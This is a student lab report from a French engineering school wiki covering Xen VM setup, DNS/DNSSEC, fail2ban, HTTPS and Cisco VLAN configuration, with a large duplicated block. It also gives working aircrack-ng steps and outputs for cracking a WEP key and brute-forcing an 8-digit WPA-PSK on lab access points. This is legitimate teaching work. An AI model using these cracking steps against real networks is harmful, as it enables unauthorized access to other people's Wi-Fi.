ifup pont_ironman
</syntaxhighlight>

== Création des machines virtuelles ==
Nous avons '''créé nos trois machines''' sur le serveur capbreton via les commandes suivantes (nous avons mit la version excalibur de devuan sur la mandataire pour essayer) :<syntaxhighlight lang="bash">
root@capbreton:~# xen-create-image --hostname=SE4.batman --dhcp --bridge=pont_ironman --dir=/usr/local/xen --size=10GB --dist=daedalus --memory=2G
root@capbreton:~# xen-create-image --hostname=SE4.catwoman --dhcp --bridge=pont_ironman --dir=/usr/local/xen --size=10GB --dist=daedalus --memory=2G
root@capbreton:~# xen-create-image --hostname=SE4.superman --dhcp --bridge=pont_ironman --dir=/usr/local/xen --size=10GB --dist=excalibur --memory=2G
</syntaxhighlight>Ces commandes vous donnent un tableau récapitulatif avec un le '''root password''' qu'il faut noter pour pouvoir vous connecter (ce mdp est retrouvable dans le .cfg de la machine). Si vous souhaitez changer le mdp de votre machine, veiller à mettre un mdp '''robuste''' car cette machine sera sur internet.

xen create permet de '''démarrer les machines''' avec leur fichiers de configuration :<syntaxhighlight lang="bash">
xen create /etc/xen/SE4.batman.cfg
xen create /etc/xen/SE4.catwoman.cfg
xen create /etc/xen/SE4.superman.cfg
</syntaxhighlight>xen console permet d'<nowiki/>'''accéder à la console de la machine virtuelle''' (pour quitter la console un exit suffit et pour quitter la saisie de connection '''Ctrl + Shift + 5''') :<syntaxhighlight lang="bash">
xen console SE4.batman
xen console SE4.catwoman
xen console SE4.superman
</syntaxhighlight>

== Configuration de la machine de services ==

=== Montage des partitions /home et /var ===

==== Sur capbreton ====

Pour '''créer les partitions''' /home et /var on entre les deux commandes suivantes dans <code>/dev/virtual</code> de capbreton :<syntaxhighlight lang="bash">
lvcreate -n SE4.batman.home -L 10G virtual
lvcreate -n SE4.batman.var -L 10G virtual

</syntaxhighlight>Ensuite on vient ajouter les lignes suivante dans <code>/etc/xen/batman.cfg</code> :<syntaxhighlight lang="bash">
disk = [
'file:/usr/local/xen/domains/SE4.batman/disk.img,xvda2,w',
'file:/usr/local/xen/domains/SE4.batman/swap.img,xvda1,w',
'phy:/dev/virtual/SE4.batman.home,xvdb,w',
'phy:/dev/virtual/SE4.batman.var,xvdc,w',
]
</syntaxhighlight>

==== Sur la machine de service ====

Pour '''formater et monter''' les partitions nous utilisons les commandes suivantes ('''/!\ pas dans capbreton''') :<syntaxhighlight>
mkfs -t ext4 /dev/xvdb
mkfs -t ext4 /dev/xvdc
mount /dev/xvdb /mnt
mv /var/* /mnt
umount /mnt
mount -a

</syntaxhighlight>Ajouter ces lignes dans <code>/etc/fstab</code> afin que les partitions soient '''montées de façon automatiques''' au démarrage de la VM :<syntaxhighlight lang="bash">
/dev/xvdb /var ext4 defaults 0 2
/dev/xvdc /home ext4 defaults 0 2
</syntaxhighlight>Enfin vous pouvez '''redémarrer''' la VM sur capbreton : <syntaxhighlight lang="bash">
xen shutdown SE4.batman
xen create /etc/xen/SE4.batman.cfg
</syntaxhighlight>

=== Configuration réseau ===
On modifie le fichier <code>/etc/network/interfaces</code> comme suivant :<syntaxhighlight lang="bash">
auto lo
iface lo inet loopback

# IPv4
auto eth0
iface eth0 inet static
address 192.168.69.2/24 IPv4 de batman (service)
gateway 192.168.69.1 IPv4 de superman (mandataire)

# IPv6
auto eth1
iface eth1 inet6 auto
</syntaxhighlight>

== Configuration de la machine mandataire ==
On modifie le fichier <code>/etc/network/interfaces</code> comme suivant :<syntaxhighlight lang="bash">
auto lo
iface lo inet loopback

# IPv4
auto eth0
iface eth0 inet static
address 192.168.69.1/24 # IPv4 de superman (mandataire)

auto eth1
iface eth1 inet static
address 193.48.57.169/27 # IPv4 publique de superman
gateway 193.48.57.162

</syntaxhighlight>

accées internet<syntaxhighlight lang="bash">
apt update
apt install ntp ntpdate host
apt install ntpsec ntpsec-ntpdate host
date
</syntaxhighlight>ssh des machines de service<syntaxhighlight lang="bash">
Dans /etc/xen/SE4.batman.cfg
vif = [ 'mac=00:16:3E:FA:18:CF,bridge=pont_ironman', 'mac=00:16:3E:FA:18:D0,bridge=SE4' ]

Ensuite :
xen shutdown SE4.batman
xen create /etc/xen/SE4.batman.cfg

Dans /etc/network/interfaces
auto eth1
iface eth1 inet6 auto

Dans batman :
reboot
ifdown eth1; ifup eth1

Depuis capbreton :
ssh root@<ipv6_eth1_batman>

</syntaxhighlight>

==== mascarade ====
<syntaxhighlight lang="bash">
iptables -t nat -A POSTROUTING -j MASQUERADE -s 192.168.69.0/24
iptables-save

</syntaxhighlight>et créé le fichier /etc/sysctl.conf puis mettre<syntaxhighlight lang="bash">
net.ipv4.ip_forward=1
</syntaxhighlight>

==== redirection de port pour ssh ====
<syntaxhighlight lang="bash">
iptables -t nat -A PREROUTING -p tcp --dport 2202 -j DNAT --to-destination 192.168.69.2:22
iptables -t nat -A PREROUTING -p tcp --dport 2203 -j DNAT --to-destination 192.168.69.3:22
iptables-save

</syntaxhighlight>nous avons aussi installer <code>iptables-persistent</code> pour eviter de perdre la configuration a chaque reboot.<syntaxhighlight lang="bash">
apt install iptables-persistant
</syntaxhighlight>Génération de la clé pour le certificat sur batman<syntaxhighlight lang="bash">
openssl req -nodes -newkey rsa:2048 -sha256 -keyout deadpool.tech.key -out ddeadpool.csr

Country Name (2 letter code) [AU]:FR
State or Province Name (full name) [Some-State]:Nord
Locality Name (eg, city) []:Lille
Organization Name (eg, company) [Internet Widgits Pty Ltd]:PolytechLille
Organizational Unit Name (eg, section) []:IOT
Common Name (e.g. server FQDN or YOUR name) []:deadpool.tech
Email Address []:antonin.biernacki@polytech-lille.net
</syntaxhighlight>Sur catwoman<syntaxhighlight lang="shell">
openssl req -nodes -newkey rsa:2048 -sha256 -keyout dardevil.tech.key -out dardevil.csr

Country Name (2 letter code) [AU]:FR
State or Province Name (full name) [Some-State]:Nord
Locality Name (eg, city) []:Lille
Organization Name (eg, company) [Internet Widgits Pty Ltd]:PolytechLille
Organizational Unit Name (eg, section) []:IOT
Common Name (e.g. server FQDN or YOUR name) []:dardevil.tech
Email Address []:billel.cheklat@polytech-lille.net
</syntaxhighlight>Creation d'un repertoire keys avec les droits nécessaires<syntaxhighlight lang="bash">
mkdir /etc/bind/keys
chown bind:bind /etc/bind/keys
chmod 750 /etc/bind/keys
</syntaxhighlight>DNS

Modification de /etc/bind/named.conf.local<syntaxhighlight lang="bash">
dnssec-policy "dnspol" {
keys {
ksk key-directory lifetime unlimited algorithm 13;
zsk key-directory lifetime unlimited algorithm 13;
};
nsec3param;
};

zone "deadpool.tech" {
type master;
file "/etc/bind/db.deadpool.tech";
allow-transfer{secondaries;};
notify yes;
key-directory "/etc/bind/keys";
dnssec-policy "dnspol";
inline-signing yes;
};

acl "secondaries" {
192.168.69.3;
2001:660:4401:60a0:216:3eff:fe8f:4743;
};

PARTIE COMMENTEE
zone "dardevil.tech" {
type secondary;
file "/etc/bind/backup/db.dardevil.tech";
masters{2001:660:4401:60a0:216:3eff:fe8f:4743;};
};
</syntaxhighlight>Création d'un dossier zones dans /etc/bind et y créer le fichier db.deadpool.tech<syntaxhighlight lang="bash">
$TTL 400

@ IN SOA ns.deadpool.tech. admin.deadpool.tech. (
3609 ; Version
21600 ; Refresh
3600 ; Retry
2592000 ; Expire
86400 ; Minimum TTL

);

@ IN NS ns.dardevil.tech.
@ IN NS ns.deadpool.tech.

ns IN A 193.48.57.169
ns IN AAAA 2001:660:4401:60a0:216:3eff:fe8f:4743
@ IN A 193.48.57.169
@ IN AAAA 2001:660:4401:60a0:216:3eff:fe8f:4743

www IN CNAME deadpool.tech.
</syntaxhighlight>Modification du fichier /etc/resolv.conf (il faut commenter tous les autres servers)<syntaxhighlight lang="bash">
search deadpool.tech
search dardevil.tech
nameserver 192.168.69.2
nameserver 192.168.69.3
</syntaxhighlight>Pour restart le service <syntaxhighlight lang="bash">
service named restart
</syntaxhighlight>Si il y a des erreurs la commande suivante permet de les identifier<syntaxhighlight lang="bash">
named-checkconf /etc/bind/named.conf
</syntaxhighlight>Pour tester le DNS depuis la machine de service<syntaxhighlight lang="bash">
dig @localhost deadpool.tech
</syntaxhighlight>Modification sur Gandi au niveau des deux noms de domaine

Création d'un blue record pour chacun des noms de domaine<syntaxhighlight>
ns.deadpool.tech
193.48.57.169 // adresse IPv4 de la mandataire
2001:660:4401:60a0:216:3eff:fefa:18d0 // adresse IPv6 de la machine de service
</syntaxhighlight>Ajout de external nameserver pour chacun des deux noms de domaine<syntaxhighlight>
ns.deadpool.tech // nom de domaine
ns.dardevil.tech // l'autre nom de domaine
</syntaxhighlight>Pour tester depuis l'extérieur<syntaxhighlight lang="bash">
dig deadpool.tech
</syntaxhighlight>

=== Fail2ban ===
Il faut commencer par installer fail2ban

Ensuite il faut créer un fichier jail.local dans le dossier /etc/fail2ban
<syntaxhighlight>
[sshd]
enable = true
port = ssh
filter = sshd
maxretry = 5
findtime = 300
bantime = 600
</syntaxhighlight>Pour éviter un warning sur allowipv6 il faut décommenter les lignes suivantes dans fail2ban.conf (ligne 58 à 62)<syntaxhighlight>
Option: allowipv6
Notes.: Allows IPv6 interface:
Default: auto
Values: [ auto yes (on, true, 1) no (off, false, 0) ] Default: auto
allowipv6 = auto
</syntaxhighlight>

Enfin pour lancer le service il faut rentrer la cmd suivante
<syntaxhighlight lang="bash">
service fail2ban restart
</syntaxhighlight>

=== HTTPS ===
Dans le dossier /etc/apache2/sites-available

On met la clef deadpool.tech.key et les certificats GandiCert.pem et deadpool.tech.crt (tout a été trouvé sur Gandi)<syntaxhighlight lang="bash">
<VirtualHost *:80>
ServerName deadpool.tech
ServerAlias www.deadpool.tech
Redirect permanent / https://deadpool.tech/
</VirtualHost>

<VirtualHost *:443>
ServerAdmin webmaster@localhost

DocumentRoot /var/www/html

ErrorLog ${APACHE_LOG_DIR}/error.log
CustomLog ${APACHE_LOG_DIR}/access.log combined

SSLEngine on

SSLCertificateFile /etc/apache2/sites-available/deadpool.tech.crt
SSLCertificateKeyFile /etc/apache2/sites-available/deadpool.tech.key
SSLCertificateChainFile /etc/apache2/sites-available/GandiCert.pem

<FilesMatch "\.(?:cgi|shtml|phtml|php)$">
SSLOptions +StdEnvVars
</FilesMatch>
<Directory /usr/lib/cgi-bin>
SSLOptions +StdEnvVars
</Directory>

</VirtualHost>
</syntaxhighlight>
On entre ensuite les cmd suivantes<syntaxhighlight lang="bash">
a2enmod ssl
service apache restart
a2ensite default-ssl.conf
service apache2 reload
</syntaxhighlight>

== Effraction WIFI ==

=== Cassage de clef WEP d’un point d’accès WiFi ===
'''/!\''' Dans notre cas la carte réseau de notre zabeth ne fonctionnait plus (ce cas est courant).

Mr Redon nous a donc fournit une '''clé USB Wifi''' pour pouvoir travailler.

De plus les cracotte s'arrête au 13 donc je dois prendre la '''cracotte02'''.

La commande suivante permet de d''''identifier l'interface WIFI''' qui nous intéresse :<syntaxhighlight lang="bash">
ip link
</syntaxhighlight>Ici l'interface qui nous intéresse est wlx40a5efd21410. Donc nous pouvons lancer la commande suivante afin d'<nowiki/>'''identifier l'adresse IP de notre cracotte02'''.<syntaxhighlight lang="bash">
sudo airodump-ng wlx40a5efd21410
</syntaxhighlight>Dans la liste nous avons en effet la cracotte02 sur le channel 4 et l'adresse ip suivante :<syntaxhighlight lang="bash">
04:DA:D2:9C:50:51 -62 231 0 0 4 54e. WEP WEP cracotte02
</syntaxhighlight>Enfin nous pouvons '''lancer le cassage''' de la clé avec cette commande :<syntaxhighlight lang="bash">
sudo airodump-ng wlx40a5efd21410 --bssid 04:DA:D2:9C:50:51 -c4 --write log_airodump
</syntaxhighlight>Le nombre de la section DATA doit augmenter asser vite (sinon il y a un problème) :

Après un certain temps on peut entrer la commande suivante pour '''voir si la clé à été trouvée''' (le numéro, ici 5, dépend du nombre de fois ou la commande précédente a été lancé) :<syntaxhighlight lang="bash">
aircrack-ng log_airodump-05.cap
</syntaxhighlight>Le résultat suivant est le bon on a un '''KEY FOUND''' !!<syntaxhighlight lang="bash">
Aircrack-ng 1.7

[00:00:00] Tested 808 keys (got 54157 IVs)

KB depth byte(vote)
0 0/ 13 FF(75008) AF(66048) C6(65536) A6(62464) E3(61952) 20(61696) EC(61696) E8(61440) 13(61184) 30(61184) F3(61184) FD(60928) F1(60672) 27(60416) 41(60416) 5D(60416) 8D(60416)
1 0/ 1 01(81152) 78(64256) 13(63232) AC(63232) E6(62720) 48(61952) 91(61952) 92(61696) AB(61696) 74(61440) 56(61184) A8(61184) 4A(60928) C9(60928) 17(60672) 35(60416) F2(60416)
2 9/ 2 D2(60416) D5(60160) DF(60160) 44(59904) 7A(59904) 99(59904) AD(59904) 15(59648) 2A(59648) 31(59648) 67(59648) E6(59648) 0D(59392) 16(59392) 7E(59392) DC(59392) 5B(59136)
3 0/ 1 08(79360) 1D(63744) 7D(61952) 1B(61184) CB(60928) A3(60672) 85(60160) 58(59904) AC(59904) 11(59648) 53(59648) 9C(59648) EA(59648) 81(59392) 84(59392) AA(59392) B1(59392)
4 8/ 4 9A(61440) 22(61184) DB(61184) D7(60928) 48(60672) 88(60672) 36(60416) 14(59904) 57(59904) 5C(59904) 8D(59904) CF(59904) 04(59136) 20(58880) 39(58880) B4(58880) D5(58880)

KEY FOUND! [ FF:FF:FF:FF:FA:BC:03:CB:AE:EE:EE:EE:EE ]
Decrypted correctly: 100%
</syntaxhighlight>

=== Cassage de mot de passe WPA-PSK par force brute ===
On s'intéresse maintenant à la '''kracotte02''' (information trouvable par la commande de la section précédente) :<syntaxhighlight lang="bash">
44:AD:D9:5F:87:01 -47 5 0 0 13 54e. WPA2 CCMP PSK kracotte02
</syntaxhighlight>

Pour forcer ce mot de passe par force brut nous créons via un '''fichier Python''' un dictionnaire contenant '''toutes les possibilités sur 8 chiffres'''. Le contenu de ce fichier est le suivant :<syntaxhighlight lang="python3">
with open("dictionnaire_8_chiffres.txt", "w") as f:
for i in range(100000000):
f.write(f"{i:08d}\n")
</syntaxhighlight>
Lancer ce programme afin de créer le fichier dictionnaire_8_chiffres.txt.

La commande suivante est nécessaire pour que aircrack-ng utilise notre dictionnaire :<syntaxhighlight lang="bash">
sudo aircrack-ng -w dictionnaire_8_chiffres.txt -b 44:AD:D9:5F:87:01
</syntaxhighlight>Nous pouvons enfin '''lancer le cassage du mot de passe''' par force brute via cette commande :<syntaxhighlight lang="bash">
sudo airodump-ng wlx40a5efd21410 --write airodumpWPA --bssid 44:AD:D9:5F:87:01 -c13
</syntaxhighlight>La commande ci-dessous permet de '''savoir si le mot de passe à été trouvé''' (/!\ cela peut prendre du temps selon la valeur de la clé, dans notre cas plus de 30min) :<syntaxhighlight lang="bash">
sudo aircrack-ng -w dictionnaire_8_chiffres.txt -b 44:AD:D9:5F:87:01 airodumpWPA-03.cap
</syntaxhighlight>Nous avons le bon résultat un nouveau '''KEY FOUND''' !!<syntaxhighlight lang="bash">

Aircrack-ng 1.7

[00:37:28] 66655552/100000000 keys tested (29360.85 k/s)

Time left: 18 minutes, 55 seconds 66.66%

KEY FOUND! [ 66688666 ]

Master Key : A4 3E 9E 85 7D D3 4E 0C 2C D4 D9 1C 4F 08 1A 0C
B4 BA B2 64 8C 24 38 C5 DD 27 81 8E CE 2C F4 CA

Transient Key : AA 75 80 E5 F3 77 C2 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

EAPOL HMAC : 97 42 1A DB B7 EE FB 19 C3 7C EA 9E 29 99 0A 4B
</syntaxhighlight>

=== Vlan ===
Depuis la machine batman on se ssh sur le routeur<syntaxhighlight lang="bash">
ssh -oKexAlgorithms=+diffie-hellman-group14-sha1 -oHostKeyAlgorithms=+ssh-rsa -oCiphers=+aes128-cbc admin@172.27.0.1
</syntaxhighlight>

Entrez ensuite les commandes suivantes pour le dhcp :<syntaxhighlight lang="bash">
C9200-E304>en
C9200-E304>configure
C9200-E304(config)#ip dhcp pool PoolAntonin
C9200-E304(dhcp-config)#network 10.60.14.0 255.255.255.0
C9200-E304(dhcp-config)#dns-server 193.48.57.169
C9200-E304(dhcp-config)#default-router 10.60.14.254
C9200-E304(dhcp-config)#exit
C9200-E304(config)#exit
C9200-E304>write

</syntaxhighlight>Enfin pour vérifier les commandes ont données ce que l'on souhaite<syntaxhighlight lang="bash">
C9200-E304#show running-config
</syntaxhighlight>

Création du Vlan24<syntaxhighlight lang="bash">
C9200-E304>en
C9200-E304>configure
C9200-E304(config)#Vlan 24
C9200-E304(vlan-config)#name PoolAntonin
C9200-E304(vlan-config)#exit
C9200-E304(config)#exit
C9200-E304>write

</syntaxhighlight>

Pour VRRP on peut entrer les commandes suivantes<syntaxhighlight lang="bash">
C9200-E304(config)#interface Vlan24
C9200-E304(config-if)#ip address 10.60.14.2 255.255.255.0
C9200-E304(config-if)#ipv6 address 2001:660:4401:60ae::2/64
C9200-E304(config-if)#vrrp 24 address-family ipv4
C9200-E304(config-if-vrrp)#priority 110
C9200-E304(config-if-vrrp)#address 10.60.14.1 primary
C9200-E304(config-if-vrrp)#exit-vrrp
C9200-E304(config-if)#end
</syntaxhighlight>

Pour se ssh sur le wifi<syntaxhighlight lang="bash">
ssh -oKexAlgorithms=+diffie-hellman-group1-sha1 -oHostKeyAlgorithms=+ssh-rsa -oCiphers=+aes128-cbc admin@172.27.0.4
</syntaxhighlight>
On entre ensuite ces commandes :<syntaxhighlight lang="bash">
conf t

aaa new-model
aaa authentication login eap_student14 group radius_student14
radius-server host 192.168.69.3 auth-port 1812 acct-port 1813 key secret_student14
aaa group server radius radius_student14
server 192.168.69.3 auth-port 1812 acct-port 1813
exit

dot11 ssid VM_SERVICES_14
vlan 24
authentication open eap eap_student14
authentication network-eap eap_student14
authentication key-management wpa
mbssid guest-mode
exit

interface Dot11Radio0
encryption vlan 24 mode ciphers aes-ccm
exit

interface Dot11Radio0.24
encapsulation dot1Q 24
bridge-group 24
exit

interface GigabitEthernet0.24
encapsulation dot1Q 24
bridge-group 24
exit

interface Dot11Radio0
ssid VM_SERVICES_14
exit
</syntaxhighlight>

2001:660:4401:60a0:216:3eff:fe19:f03c

Atelier SysRes SE4 2025/2026 E14

2026-02-12T15:56:16Z

Abiernac :

'''BIERNACKI Antonin'''

IOT 4

2025-2026

== Infos concernant notre binôme ==
Binôme : '''CHEKLAT Billel''' [[Atelier SysRes SE4 2025/2026 E13]]

Mandataire : '''superman'''

IP publique de la mandataire : '''193.48.57.169'''

Service 1 (Antonin) : '''batman'''

Nom de domaine 1 (Antonin) : '''deadpool.tech'''

Nom service 2 (Billel) : '''catwoman'''

Nom de domaine 1 (Billel) : '''dardevil.tech''' (le e manquant dans daredevil est une pure volonté du binôme et un choix pratique et judicieux pour ce TP ;) )

Bridge : '''pont_ironman'''

Réseau IPv4 : '''192.168.69.0/24'''

== Introduction ==

== Création du bridge ==
<syntaxhighlight lang="bash">
auto pont_ironman
iface pont_ironman inet manual
bridge_ports none
up ip link set $IFACE up
down ip link set $IFACE down
</syntaxhighlight><syntaxhighlight lang="bash">
ifup pont_ironman
</syntaxhighlight>

== Création des machines virtuelles ==
Nous avons '''créé nos trois machines''' sur le serveur capbreton via les commandes suivantes (nous avons mit la version excalibur de devuan sur la mandataire pour essayer) :<syntaxhighlight lang="bash">
root@capbreton:~# xen-create-image --hostname=SE4.batman --dhcp --bridge=pont_ironman --dir=/usr/local/xen --size=10GB --dist=daedalus --memory=2G
root@capbreton:~# xen-create-image --hostname=SE4.catwoman --dhcp --bridge=pont_ironman --dir=/usr/local/xen --size=10GB --dist=daedalus --memory=2G
root@capbreton:~# xen-create-image --hostname=SE4.superman --dhcp --bridge=pont_ironman --dir=/usr/local/xen --size=10GB --dist=excalibur --memory=2G
</syntaxhighlight>Ces commandes vous donnent un tableau récapitulatif avec un le '''root password''' qu'il faut noter pour pouvoir vous connecter (ce mdp est retrouvable dans le .cfg de la machine). Si vous souhaitez changer le mdp de votre machine, veiller à mettre un mdp '''robuste''' car cette machine sera sur internet.

xen create permet de '''démarrer les machines''' avec leur fichiers de configuration :<syntaxhighlight lang="bash">
xen create /etc/xen/SE4.batman.cfg
xen create /etc/xen/SE4.catwoman.cfg
xen create /etc/xen/SE4.superman.cfg
</syntaxhighlight>xen console permet d'<nowiki/>'''accéder à la console de la machine virtuelle''' (pour quitter la console un exit suffit et pour quitter la saisie de connection '''Ctrl + Shift + 5''') :<syntaxhighlight lang="bash">
xen console SE4.batman
xen console SE4.catwoman
xen console SE4.superman
</syntaxhighlight>

== Configuration de la machine de services ==

=== Montage des partitions /home et /var ===

==== Sur capbreton ====

Pour '''créer les partitions''' /home et /var on entre les deux commandes suivantes dans <code>/dev/virtual</code> de capbreton :<syntaxhighlight lang="bash">
lvcreate -n SE4.batman.home -L 10G virtual
lvcreate -n SE4.batman.var -L 10G virtual

</syntaxhighlight>Ensuite on vient ajouter les lignes suivante dans <code>/etc/xen/batman.cfg</code> :<syntaxhighlight lang="bash">
disk = [
'file:/usr/local/xen/domains/SE4.batman/disk.img,xvda2,w',
'file:/usr/local/xen/domains/SE4.batman/swap.img,xvda1,w',
'phy:/dev/virtual/SE4.batman.home,xvdb,w',
'phy:/dev/virtual/SE4.batman.var,xvdc,w',
]
</syntaxhighlight>

==== Sur la machine de service ====

Pour '''formater et monter''' les partitions nous utilisons les commandes suivantes ('''/!\ pas dans capbreton''') :<syntaxhighlight>
mkfs -t ext4 /dev/xvdb
mkfs -t ext4 /dev/xvdc
mount /dev/xvdb /mnt
mv /var/* /mnt
umount /mnt
mount -a

</syntaxhighlight>Ajouter ces lignes dans <code>/etc/fstab</code> afin que les partitions soient '''montées de façon automatiques''' au démarrage de la VM :<syntaxhighlight lang="bash">
/dev/xvdb /var ext4 defaults 0 2
/dev/xvdc /home ext4 defaults 0 2
</syntaxhighlight>Enfin vous pouvez '''redémarrer''' la VM sur capbreton : <syntaxhighlight lang="bash">
xen shutdown SE4.batman
xen create /etc/xen/SE4.batman.cfg
</syntaxhighlight>

=== Configuration réseau ===
On modifie le fichier <code>/etc/network/interfaces</code> comme suivant :<syntaxhighlight lang="bash">
auto lo
iface lo inet loopback

# IPv4
auto eth0
iface eth0 inet static
address 192.168.69.2/24 IPv4 de batman (service)
gateway 192.168.69.1 IPv4 de superman (mandataire)

# IPv6
auto eth1
iface eth1 inet6 auto
</syntaxhighlight>

== Configuration de la machine mandataire ==
On modifie le fichier <code>/etc/network/interfaces</code> comme suivant :<syntaxhighlight lang="bash">
auto lo
iface lo inet loopback

# IPv4
auto eth0
iface eth0 inet static
address 192.168.69.1/24 # IPv4 de superman (mandataire)

auto eth1
iface eth1 inet static
address 193.48.57.169/27 # IPv4 publique de superman
gateway 193.48.57.162

</syntaxhighlight>

accées internet<syntaxhighlight lang="bash">
apt update
apt install ntp ntpdate host
apt install ntpsec ntpsec-ntpdate host
date
</syntaxhighlight>ssh des machines de service<syntaxhighlight lang="bash">
Dans /etc/xen/SE4.batman.cfg
vif = [ 'mac=00:16:3E:FA:18:CF,bridge=pont_ironman', 'mac=00:16:3E:FA:18:D0,bridge=SE4' ]

Ensuite :
xen shutdown SE4.batman
xen create /etc/xen/SE4.batman.cfg

Dans /etc/network/interfaces
auto eth1
iface eth1 inet6 auto

Dans batman :
reboot
ifdown eth1; ifup eth1

Depuis capbreton :
ssh root@<ipv6_eth1_batman>

</syntaxhighlight>

==== mascarade ====
<syntaxhighlight lang="bash">
iptables -t nat -A POSTROUTING -j MASQUERADE -s 192.168.69.0/24
iptables-save

</syntaxhighlight>et créé le fichier /etc/sysctl.conf puis mettre<syntaxhighlight lang="bash">
net.ipv4.ip_forward=1
</syntaxhighlight>

==== redirection de port pour ssh ====
<syntaxhighlight lang="bash">
iptables -t nat -A PREROUTING -p tcp --dport 2202 -j DNAT --to-destination 192.168.69.2:22
iptables -t nat -A PREROUTING -p tcp --dport 2203 -j DNAT --to-destination 192.168.69.3:22
iptables-save

</syntaxhighlight>nous avons aussi installer <code>iptables-persistent</code> pour eviter de perdre la configuration a chaque reboot.<syntaxhighlight lang="bash">
apt install iptables-persistant
</syntaxhighlight>Génération de la clé pour le certificat sur batman<syntaxhighlight lang="bash">
openssl req -nodes -newkey rsa:2048 -sha256 -keyout deadpool.tech.key -out ddeadpool.csr

Country Name (2 letter code) [AU]:FR
State or Province Name (full name) [Some-State]:Nord
Locality Name (eg, city) []:Lille
Organization Name (eg, company) [Internet Widgits Pty Ltd]:PolytechLille
Organizational Unit Name (eg, section) []:IOT
Common Name (e.g. server FQDN or YOUR name) []:deadpool.tech
Email Address []:antonin.biernacki@polytech-lille.net
</syntaxhighlight>Sur catwoman<syntaxhighlight lang="shell">
openssl req -nodes -newkey rsa:2048 -sha256 -keyout dardevil.tech.key -out dardevil.csr

Country Name (2 letter code) [AU]:FR
State or Province Name (full name) [Some-State]:Nord
Locality Name (eg, city) []:Lille
Organization Name (eg, company) [Internet Widgits Pty Ltd]:PolytechLille
Organizational Unit Name (eg, section) []:IOT
Common Name (e.g. server FQDN or YOUR name) []:dardevil.tech
Email Address []:billel.cheklat@polytech-lille.net
</syntaxhighlight>Creation d'un repertoire keys avec les droits nécessaires<syntaxhighlight lang="bash">
mkdir /etc/bind/keys
chown bind:bind /etc/bind/keys
chmod 750 /etc/bind/keys
</syntaxhighlight>DNS

Modification de /etc/bind/named.conf.local<syntaxhighlight lang="bash">
dnssec-policy "dnspol" {
keys {
ksk key-directory lifetime unlimited algorithm 13;
zsk key-directory lifetime unlimited algorithm 13;
};
nsec3param;
};

zone "deadpool.tech" {
type master;
file "/etc/bind/db.deadpool.tech";
allow-transfer{secondaries;};
notify yes;
key-directory "/etc/bind/keys";
dnssec-policy "dnspol";
inline-signing yes;
};

acl "secondaries" {
192.168.69.3;
2001:660:4401:60a0:216:3eff:fe8f:4743;
};

PARTIE COMMENTEE
zone "dardevil.tech" {
type secondary;
file "/etc/bind/backup/db.dardevil.tech";
masters{2001:660:4401:60a0:216:3eff:fe8f:4743;};
};
</syntaxhighlight>Création d'un dossier zones dans /etc/bind et y créer le fichier db.deadpool.tech<syntaxhighlight lang="bash">
$TTL 400

@ IN SOA ns.deadpool.tech. admin.deadpool.tech. (
3609 ; Version
21600 ; Refresh
3600 ; Retry
2592000 ; Expire
86400 ; Minimum TTL

);

@ IN NS ns.dardevil.tech.
@ IN NS ns.deadpool.tech.

ns IN A 193.48.57.169
ns IN AAAA 2001:660:4401:60a0:216:3eff:fe8f:4743
@ IN A 193.48.57.169
@ IN AAAA 2001:660:4401:60a0:216:3eff:fe8f:4743

www IN CNAME deadpool.tech.
</syntaxhighlight>Modification du fichier /etc/resolv.conf (il faut commenter tous les autres servers)<syntaxhighlight lang="bash">
search deadpool.tech
search dardevil.tech
nameserver 192.168.69.2
nameserver 192.168.69.3
</syntaxhighlight>Pour restart le service <syntaxhighlight lang="bash">
service named restart
</syntaxhighlight>Si il y a des erreurs la commande suivante permet de les identifier<syntaxhighlight lang="bash">
named-checkconf /etc/bind/named.conf
</syntaxhighlight>Pour tester le DNS depuis la machine de service<syntaxhighlight lang="bash">
dig @localhost deadpool.tech
</syntaxhighlight>Modification sur Gandi au niveau des deux noms de domaine

Création d'un blue record pour chacun des noms de domaine<syntaxhighlight>
ns.deadpool.tech
193.48.57.169 // adresse IPv4 de la mandataire
2001:660:4401:60a0:216:3eff:fefa:18d0 // adresse IPv6 de la machine de service
</syntaxhighlight>Ajout de external nameserver pour chacun des deux noms de domaine<syntaxhighlight>
ns.deadpool.tech // nom de domaine
ns.dardevil.tech // l'autre nom de domaine
</syntaxhighlight>Pour tester depuis l'extérieur<syntaxhighlight lang="bash">
dig deadpool.tech
</syntaxhighlight>

=== Fail2ban ===
Il faut commencer par installer fail2ban

Ensuite il faut créer un fichier jail.local dans le dossier /etc/fail2ban
<syntaxhighlight>
[sshd]
enable = true
port = ssh
filter = sshd
maxretry = 5
findtime = 300
bantime = 600
</syntaxhighlight>Pour éviter un warning sur allowipv6 il faut décommenter les lignes suivantes dans fail2ban.conf (ligne 58 à 62)<syntaxhighlight>
Option: allowipv6
Notes.: Allows IPv6 interface:
Default: auto
Values: [ auto yes (on, true, 1) no (off, false, 0) ] Default: auto
allowipv6 = auto
</syntaxhighlight>

Enfin pour lancer le service il faut rentrer la cmd suivante
<syntaxhighlight lang="bash">
service fail2ban restart
</syntaxhighlight>

=== HTTPS ===
Dans le dossier /etc/apache2/sites-available

On met la clef deadpool.tech.key et les certificats GandiCert.pem et deadpool.tech.crt (tout a été trouvé sur Gandi)<syntaxhighlight lang="bash">
<VirtualHost *:80>
ServerName deadpool.tech
ServerAlias www.deadpool.tech
Redirect permanent / https://deadpool.tech/
</VirtualHost>

<VirtualHost *:443>
ServerAdmin webmaster@localhost

DocumentRoot /var/www/html

ErrorLog ${APACHE_LOG_DIR}/error.log
CustomLog ${APACHE_LOG_DIR}/access.log combined

SSLEngine on

SSLCertificateFile /etc/apache2/sites-available/deadpool.tech.crt
SSLCertificateKeyFile /etc/apache2/sites-available/deadpool.tech.key
SSLCertificateChainFile /etc/apache2/sites-available/GandiCert.pem

<FilesMatch "\.(?:cgi|shtml|phtml|php)$">
SSLOptions +StdEnvVars
</FilesMatch>
<Directory /usr/lib/cgi-bin>
SSLOptions +StdEnvVars
</Directory>

</VirtualHost>
</syntaxhighlight>
On entre ensuite les cmd suivantes<syntaxhighlight lang="bash">
a2enmod ssl
service apache restart
a2ensite default-ssl.conf
service apache2 reload
</syntaxhighlight>

== Effraction WIFI ==

=== Cassage de clef WEP d’un point d’accès WiFi ===
'''/!\''' Dans notre cas la carte réseau de notre zabeth ne fonctionnait plus (ce cas est courant).

Mr Redon nous a donc fournit une '''clé USB Wifi''' pour pouvoir travailler.

